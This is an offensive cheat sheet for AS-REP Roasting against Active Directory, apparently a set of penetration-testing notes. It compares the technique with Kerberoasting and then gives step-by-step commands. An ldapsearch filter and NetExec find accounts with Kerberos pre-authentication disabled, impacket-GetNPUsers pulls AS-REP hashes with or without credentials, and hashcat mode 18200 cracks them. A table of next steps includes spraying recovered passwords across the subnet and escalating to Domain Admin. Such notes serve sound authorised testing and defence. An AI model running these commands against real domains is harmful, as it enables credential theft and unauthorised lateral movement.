Comparison to Kerberoasting
| AS-REP Roasting | Kerberoasting | |
|---|---|---|
| Credentials needed | None or low priv | Low priv required |
| Target | Accounts with pre-auth disabled | Accounts with SPNs |
| Ticket type | AS-REP (TGT response) | TGS (service ticket) |
| Hashcat mode | 18200 | 13100 |
| Account type | Any user | Service accounts |
Prerequisites
- Username list OR low-privilege domain credentials
- At least one account with pre-auth disabled
Attack Flow
Identify accounts with pre-auth disabled (BloodHound / ldapsearch / GetNPUsers)
→ Request AS-REP ticket — no password needed
→ DC returns AS-REP encrypted with account's password hash
→ Crack offline (Hashcat mode 18200) → recover plaintext passwordStep 0 - Identify Vulnerable Accounts
# BloodHound query: Find AS-REP Roastable Users
ldapsearch -x -H ldap://<dc-ip> \
-D '<username>@<domain.local>' \
-w '<password>' \
-b "DC=<domain>,DC=local" \
"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \
sAMAccountName
nxc ldap <dc-ip> -u <username> -p <password> --asreproast /tmp/asrep_check.txtStep 1 - Request AS-REP Tickets
With credentials:
impacket-GetNPUsers \
'<domain.local>/<username>:<password>' \
-dc-ip <dc-ip> \
-request \
-outputfile asrep_hashes.txt
# Specific account list
impacket-GetNPUsers \
'<domain.local>/<username>:<password>' \
-dc-ip <dc-ip> \
-request \
-usersfile userlist.txt \
-outputfile asrep_hashes.txtWithout credentials (username list only):
impacket-GetNPUsers \
'<domain.local>/' \
-dc-ip <dc-ip> \
-no-pass \
-usersfile userlist.txt \
-outputfile asrep_hashes.txtVia NetExec:
nxc ldap <dc-ip> -u <username> -p <password> --asreproast /tmp/asrep_hashes.txt
# Without credentials
nxc ldap <dc-ip> -u userlist.txt -p '' --asreproast /tmp/asrep_hashes.txtStep 2 - Crack the Hashes
hashcat -m 18200 asrep_hashes.txt <wordlist>
hashcat -m 18200 asrep_hashes.txt <wordlist> -r /usr/share/hashcat/rules/best64.rule
hashcat -m 18200 asrep_hashes.txt --showWhat Each Result Tells You
| Finding | Implication |
|---|---|
| Accounts with pre-auth disabled found | Attempt roasting immediately |
| High privilege account is roastable | Critical — likely path to DA |
| Hash cracked | Pass the password across subnet via nxc |
| Not cracked with rockyou | Try larger wordlist or rules |
| No accounts found | Move to Kerberoasting |
Flag Reference
impacket-GetNPUsers
| Flag | Meaning |
|---|---|
<domain>/<user>:<pass> | Credentials to authenticate to DC |
-dc-ip | DC IP |
-request | Request AS-REP tickets |
-no-pass | Run without credentials — needs username list |
-usersfile | Usernames to test |
-outputfile | Save hashes |
nxc
| Flag | Meaning |
|---|---|
ldap | Use LDAP protocol |
--asreproast <file> | Run AS-REP roasting, save to file |